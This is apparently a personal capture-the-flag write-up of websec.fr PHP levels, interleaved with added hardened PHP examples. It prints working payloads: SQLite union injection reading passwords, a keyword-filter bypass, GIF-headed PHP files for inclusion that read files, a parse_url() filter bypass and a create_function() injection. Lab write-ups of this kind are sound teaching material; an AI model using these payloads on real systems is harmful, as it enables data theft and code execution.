WEBSEC.FR

A platform from abroad. A teammate mentioned earlier that it has a lot of sneaky tricks, and since I was stuck on the BUU challenges anyway, I came over to work through it.

babysteps

Level01

SQLite injection.

1 order by 2
# column count is 2
-1 union select 1,2
# columns 1 and 2 are echoed back
-1 union select 1,name from sqlite_master WHERE type='table'
# gives the table name: users
-1 union select 1,sql from sqlite_master WHERE type='table'
# gives the table structure: CREATE TABLE users(id int(7), username varchar(255), password varchar(255))
-1 union select 1,password from users where id=1
# gives the flag

Level04

The source code is provided.

<?php 
include 'connect.php'; 
$sql = new SQL(); 
$sql->connect();
$sql->query = 'SELECT username FROM users WHERE id=';
 
if (isset ($_COOKIE['leet_hax0r'])) {
    $sess_data = unserialize (base64_decode ($_COOKIE['leet_hax0r']));
    try {
        if (is_array($sess_data) && $sess_data['ip'] != $_SERVER['REMOTE_ADDR']) {
            die('CANT HACK US!!!');
        }
    } catch(Exception $e) {
        echo $e;
    }
} else {
    $cookie = base64_encode (serialize (array ( 'ip' => $_SERVER['REMOTE_ADDR']))) ;
    setcookie ('leet_hax0r', $cookie, time () + (86400 * 30));
}
 
if (isset ($_REQUEST['id']) && is_numeric ($_REQUEST['id'])) {
    try {
        $sql->query .= $_REQUEST['id'];
    } catch(Exception $e) {
        echo ' Invalid query';
    }
}
<?php 
class SQL { 
    public $query = ''; 
    public $conn; 
    public function __construct() { 
    } 
    public function connect() {
        $this->conn = new SQLite3 ("database.db", SQLITE3_OPEN_READONLY);
    }
 
    public function SQL_query($query) {
        $this->query = $query;
    }
 
    public function execute() {
        return $this->conn->query ($this->query);
    }
 
    public function __destruct() {
        if (!isset ($this->conn)) {
            $this->connect ();
        }
 
        $ret = $this->execute ();
        if (false !== $ret) {    
            while (false !== ($row = $ret->fetchArray (SQLITE3_ASSOC))) {
                echo '';
            }
        }
    }
}

Auditing the code shows that the cookie is passed through unserialize() first, so the value that comes out can be an SQL object, and from there it enters the SQL class: its __destruct() executes whatever query the object carries.

Construct the object accordingly and replace the cookie to get the flag.
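As an added example (not the challenge's code and not from the original writeup), this is how the `leet_hax0r` cookie could be handled so that attacker-controlled bytes never reach unserialize(): session data is carried as JSON under an HMAC, and a legacy path that still has to accept serialized cookies refuses object creation. `$secret` and the IP address are constructed values.

```php
<?php
// Added example, not the challenge's code: cookie handling for Level04's
// 'leet_hax0r' cookie that never hands attacker-controlled bytes to unserialize().
// $secret is an assumed server-side key (a constructed value here).

$secret = 'constructed-example-key';

// Session data is encoded as JSON (json_decode can only produce arrays and scalars,
// never PHP objects) and signed with an HMAC so any edit to the cookie is detected.
function makeSessionCookie(array $data, string $secret): string
{
    $payload = base64_encode(json_encode($data));
    return $payload . '.' . hash_hmac('sha256', $payload, $secret);
}

// Verify the MAC before decoding anything. Returns null for a tampered or malformed cookie.
function readSessionCookie(string $cookie, string $secret): ?array
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$payload, $mac] = $parts;
    if (!hash_equals(hash_hmac('sha256', $payload, $secret), $mac)) {
        return null; // forged or modified
    }
    $raw = base64_decode($payload, true);
    $data = $raw === false ? null : json_decode($raw, true);
    return is_array($data) ? $data : null;
}

// If serialized cookies from older clients must still be read, forbid object
// creation: a serialized SQL object comes back as __PHP_Incomplete_Class, so its
// __destruct() is never invoked, and anything that is not an array is discarded.
function readLegacyCookie(string $cookie): ?array
{
    $raw = base64_decode($cookie, true);
    if ($raw === false) {
        return null;
    }
    $data = @unserialize($raw, ['allowed_classes' => false]);
    return is_array($data) ? $data : null;
}

// Constructed values for the demonstration.
$ip = '203.0.113.10';
$good = makeSessionCookie(['ip' => $ip], $secret);
var_dump(readSessionCookie($good, $secret));        // ['ip' => '203.0.113.10']
var_dump(readSessionCookie($good . '0', $secret));  // NULL: MAC mismatch
var_dump(readLegacyCookie(base64_encode(serialize(['ip' => $ip])))); // ['ip' => '203.0.113.10']
var_dump(readLegacyCookie(base64_encode('O:3:"SQL":0:{}')));         // NULL: object creation refused

// The challenge's IP check, now done on verified data only.
$sess = readSessionCookie($good, $secret);
var_dump($sess !== null && ($sess['ip'] ?? null) === $ip); // true
```

The design point is that the challenge's `is_array($sess_data)` check runs after unserialize() has already created the object, so the destructor fires regardless of the check's outcome; the only reliable fix is to keep untrusted data out of unserialize() entirely, with `allowed_classes => false` as the fallback when the format cannot be changed.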


Level17

Just throw an array at it.

strcasecmp() returns 0 when handed an array, which satisfies the condition.


Level25

<?php 
parse_str(parse_url($_SERVER['REQUEST_URI'])['query'], $query); 
foreach ($query as $k => $v) {
    if (stripos($v, 'flag') !== false)
        die('You are not allowed to get the flag, sorry :/');
}
include $_GET['page'] . '.txt';

The problem is in parse_url(): when it is handed a URL it cannot parse it returns false, so the query loop has nothing to iterate over and the "flag" filter is never applied.

payload:page=flag&:80

Or use

http://websec.fr///level25/index.php?page=flag
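As an added example (not the challenge's code and not from the original writeup), the block below wraps the Level25 filter in a function to show how it behaves when parse_url() fails, then gives a replacement that does not re-parse the request URI at all and resolves the page through an allowlist. The allowlisted page names are an assumption; the request URIs are constructed, the triple-slash one being the writeup's own payload.

```php
<?php
// Added example, not the challenge's code. Part 1 mirrors the Level25 filter;
// part 2 is a replacement that uses $_GET and an allowlist instead.

// Mirrors the challenge's filter as a function: true means the request would be
// allowed through to the include.
function level25Filter(string $requestUri): bool
{
    $parsed = parse_url($requestUri);
    // When parse_url() returns false, the challenge reads ['query'] from false,
    // gets nothing, and the loop below never executes.
    $queryString = is_array($parsed) ? ($parsed['query'] ?? '') : '';
    parse_str($queryString, $query);
    foreach ($query as $v) {
        if (is_string($v) && stripos($v, 'flag') !== false) {
            return false;
        }
    }
    return true;
}

// Hardened replacement: take the parameter from PHP's own $_GET, reject
// non-strings, and map it through an allowlist. There is no bad-word filter to
// get around because unknown page names are simply not resolvable.
const ALLOWED_PAGES = ['home', 'about', 'contact']; // assumed page names

function resolvePage(array $get): ?string
{
    $page = $get['page'] ?? null;
    if (!is_string($page) || !in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    return __DIR__ . '/pages/' . $page . '.txt';
}

// Constructed request URIs; the second is the writeup's triple-slash payload.
var_dump(level25Filter('/level25/index.php?page=flag'));   // false: caught by the filter
var_dump(parse_url('///level25/index.php?page=flag'));      // false: "//" with no host, parsing fails
var_dump(level25Filter('///level25/index.php?page=flag'));  // true: nothing was filtered
var_dump(resolvePage(['page' => 'flag']));                  // NULL: not on the allowlist
var_dump(resolvePage(['page' => 'about']));                 // ".../pages/about.txt"
```

If a component really must parse the raw URI itself, a `parse_url()` result of false has to be treated as a rejection (fail closed), never as "no parameters"; the allowlist makes that question moot for the include.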


Level28

<?php
if(isset($_POST['submit'])) {
    if ($_FILES['flag_file']['size'] > 4096) {
        die('Your file is too heavy.');
    }
    $filename = md5($_SERVER['REMOTE_ADDR']) . '.php';

    $fp = fopen($_FILES['flag_file']['tmp_name'], 'r');
    $flagfilecontent = fread($fp, filesize($_FILES['flag_file']['tmp_name']));
    @fclose($fp);

    file_put_contents($filename, $flagfilecontent);
    if (md5_file($filename) === md5_file('flag.php') && $_POST['checksum'] == crc32($_POST['checksum'])) {
        include($filename);  // it contains the `$flag` variable
    } else {
        $flag = "Nope, $filename is not the right file, sorry.";
        sleep(1);  // Deter bruteforce
    }

    unlink($filename);
}

A race-condition challenge.
I didn't manage to reproduce it.
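As an added example (not the challenge's code and not from the original writeup), the check below does what Level28 does without the window the race depends on: the uploaded temp file is hashed in place, so no `.php` file is ever written under the web root and there is no interval between write and unlink in which another request could reach it. `flag.php` is the challenge's reference file; the files in the demo are constructed temporary files.

```php
<?php
// Added example, not the challenge's code: the Level28 comparison rewritten
// without the write-then-include-then-unlink sequence.

function checkUpload(array $file, string $referencePath, int $maxSize = 4096): bool
{
    // Only a file PHP itself received through the upload mechanism is considered.
    if (($file['error'] ?? null) !== UPLOAD_ERR_OK || !isset($file['tmp_name'], $file['size'])) {
        return false;
    }
    if ($file['size'] > $maxSize) {
        return false;
    }
    // Hash the temp file directly. PHP's upload temp directory is outside the
    // document root and the file is removed when the request ends, so nothing
    // with a user-chosen body ever exists at a predictable, web-reachable path.
    $uploaded = hash_file('sha256', $file['tmp_name']);
    $expected = hash_file('sha256', $referencePath);
    if ($uploaded === false || $expected === false) {
        return false;
    }
    // hash_equals() is strict (no == type juggling) and constant-time.
    return hash_equals($expected, $uploaded);
}

// Constructed demo files in the system temp directory.
$reference = tempnam(sys_get_temp_dir(), 'ref');
file_put_contents($reference, "<?php \$flag = 'constructed-flag-value';");
$matching = tempnam(sys_get_temp_dir(), 'up');
copy($reference, $matching);
$other = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($other, "<?php echo 'not the flag';");

$asUpload = fn(string $path) => ['tmp_name' => $path, 'size' => filesize($path), 'error' => UPLOAD_ERR_OK];
var_dump(checkUpload($asUpload($matching), $reference)); // true: contents identical
var_dump(checkUpload($asUpload($other), $reference));    // false: different contents
var_dump(checkUpload(['tmp_name' => $other, 'size' => 1, 'error' => UPLOAD_ERR_PARTIAL], $reference)); // false

foreach ([$reference, $matching, $other] as $f) {
    unlink($f);
}
```

When a copy of an upload genuinely has to be kept, the same rule applies: move it with move_uploaded_file() to a directory outside the document root, under a random name with a non-executable extension, and never include() it.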

easy

Level02

Same as Level01, except some keywords are filtered out: union, order, select, from, group, by. Double-writing them works.

-1 uniunionon seselectlect 1,password frfromom users where id=1
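As an added example serving both Level01 and Level02 (not the challenge's code and not from the original writeup), the block below rebuilds the `users` table the Level01 writeup recovered from sqlite_master in an in-memory SQLite database with constructed rows, then contrasts three lookups: the challenge's string concatenation, a Level02-style keyword filter in front of it, and a bound parameter. Only the last one is a fix.

```php
<?php
// Added example, not the challenge's code. Table layout is the one recovered in
// the Level01 writeup; the rows are constructed sample data.

$db = new SQLite3(':memory:');
$db->exec('CREATE TABLE users(id int(7), username varchar(255), password varchar(255))');
$db->exec("INSERT INTO users VALUES (1, 'admin', 'FLAG{constructed-sample}')");
$db->exec("INSERT INTO users VALUES (2, 'guest', 'guest-password')");

function rowsOf(SQLite3Result $res): array
{
    $rows = [];
    while (($row = $res->fetchArray(SQLITE3_ASSOC)) !== false) {
        $rows[] = $row;
    }
    return $rows;
}

// Level01: the raw parameter becomes part of the SQL text.
function lookupConcat(SQLite3 $db, string $id): array
{
    return rowsOf($db->query('SELECT id, username FROM users WHERE id=' . $id));
}

// Level02: the same query behind a filter that deletes each keyword once.
// Deleting "union" from "uniunionon" leaves "union", so the filter is not a fix.
function lookupFiltered(SQLite3 $db, string $id): array
{
    $stripped = str_ireplace(['union', 'order', 'select', 'from', 'group', 'by'], '', $id);
    return lookupConcat($db, $stripped);
}

// Fix: validate the shape of the input and bind it as a typed parameter, so the
// database engine never parses user data as SQL.
function lookupBound(SQLite3 $db, string $id): array
{
    if (!ctype_digit($id)) {
        return []; // not a plain integer id
    }
    $stmt = $db->prepare('SELECT id, username FROM users WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, SQLITE3_INTEGER);
    return rowsOf($stmt->execute());
}

$level01 = '-1 union select 1,password from users where id=1';           // payload from the writeup
$level02 = '-1 uniunionon seselectlect 1,password frfromom users where id=1';

var_dump(lookupConcat($db, $level01));   // password appears in the username column
var_dump(lookupFiltered($db, $level02)); // same result: the filter reassembles the payload
var_dump(lookupBound($db, $level01));    // []: rejected before any SQL runs
var_dump(lookupBound($db, '2'));         // [['id' => 2, 'username' => 'guest']]
```

The `ctype_digit()` guard is defence in depth; the bound integer parameter alone already keeps the input out of the SQL grammar, which a keyword blacklist never can.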


Level08

File inclusion; it checks for a GIF header.

GIF89a
<?php var_dump(scandir('./')); ?>

flag.txt shows up.

Just read it.

GIF89a
<?php var_dump(file_get_contents('flag.txt')); ?>

Level10

The source code is provided.

<?php      
if (isset ($_REQUEST['f']) && isset ($_REQUEST['hash'])) {
    $file = $_REQUEST['f'];
    $request = $_REQUEST['hash'];
    $hash = substr (md5 ($flag . $file . $flag), 0, 8);
    echo '';
    if ($request == $hash) {
        show_source ($file);
    } else {
        echo 'Permission denied!';
    }
     echo '';
}

It takes the first eight characters of md5($flag.$file.$flag), and if the comparison passes it outputs the file.

Then I was a bit stuck: the flag is unknown, so brute-forcing isn't reasonable..

Let me look at a writeup!

Seems to be a weak-typing challenge.

Haven't reproduced it yet.
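As an added example serving both Level10 (a loose `==` between an 8-character hash prefix and request input) and Level17 (an array handed to strcasecmp() where a string was expected), the block below shows the hardened form of both checks: reject anything that is not a string, then compare with hash_equals(). It is not the challenge's code; `$flag` and the file name are constructed values.

```php
<?php
// Added example, not the challenge's code. $flag is a constructed value.

$flag = 'constructed-secret-value';

function expectedTag(string $flag, string $file): string
{
    return substr(md5($flag . $file . $flag), 0, 8);
}

// The challenge's comparison. == between two numeric-looking strings compares
// them as numbers, and a non-string $request is type-juggled rather than rejected.
function looseCheck(string $flag, string $file, $request): bool
{
    return $request == expectedTag($flag, $file);
}

// Hardened: type check first, then a strict, constant-time comparison.
function strictCheck(string $flag, string $file, $request): bool
{
    if (!is_string($request)) {
        return false; // arrays, ints, null: rejected before any string function runs
    }
    return hash_equals(expectedTag($flag, $file), $request);
}

// The same rule applied to a strcasecmp()-style check (Level17): validate the type first.
function nameMatches($input, string $expected): bool
{
    return is_string($input) && strcasecmp($input, $expected) === 0;
}

$tag = expectedTag($flag, 'index.php');
var_dump(looseCheck($flag, 'index.php', $tag));            // true
var_dump(strictCheck($flag, 'index.php', $tag));           // true: exact match
var_dump(strictCheck($flag, 'index.php', ['index.php']));  // false: array rejected
var_dump(strictCheck($flag, 'index.php', strtoupper($tag))); // false: case differs, no juggling

// The quirk behind the loose check: both sides are numeric strings, so == is numeric.
var_dump('1e3' == '1000');            // true
var_dump(hash_equals('1e3', '1000')); // false

var_dump(nameMatches(['admin'], 'admin')); // false: array rejected
var_dump(nameMatches('ADMIN', 'admin'));   // true
```

Two rules cover both levels: anything taken from `$_REQUEST` may be an array, so check `is_string()` before it reaches a string function, and secrets or hashes are compared with hash_equals() rather than `==`.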


Level11

Don't know how yet..


Level15

create_function() vulnerability.

I've written about it before, so I won't go into detail.

;}echo($flag);//
